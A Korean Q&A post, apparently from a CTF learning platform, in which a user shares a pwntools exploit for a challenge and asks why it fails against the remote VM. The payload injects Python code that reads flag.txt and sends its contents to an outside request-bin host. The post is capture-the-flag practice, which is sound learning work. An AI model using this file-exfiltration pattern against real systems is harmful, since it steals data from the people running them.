대기중
어떤 방법이 있을까요..?
답변 0 · 추천 0 · 조회 76
문제 이름을 입력해주세요

안녕하세요, 아래는 제가 짠 익스플로잇 코드입니다.

from pwn import *
import sys

r = process(["python3", "chall.py"])
#r = remote(sys.argv[1], int(sys.argv[2]))

payload = "import urllib.request; import urllib.parse; f=open('flag.txt').read(); f.strip(); encoded_data = urllib.parse.quote(f); url = f'https://yinnqcu.request.dreamhack.games?data={encoded_data}'; urllib.request.urlopen(url);"

r.sendline(f"{payload}".encode())

flag.txt를 읽고, request bin으로 그 내용을 보내는 코드를 짜보았습니다. 로컬에서 chall.py 대상으로 공격했을 땐 성공했는데, VM으로 연결하니까 작동을 하지 않았습니다. 어떤 것이 문제일지 힌트 또는 설명을 받을 수 있을지 궁금합니다. 감사합니다.

#pwnable #misc
2025.08.20. 04:12
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
구독하고 Q&A Ticket 시작하기
답변 0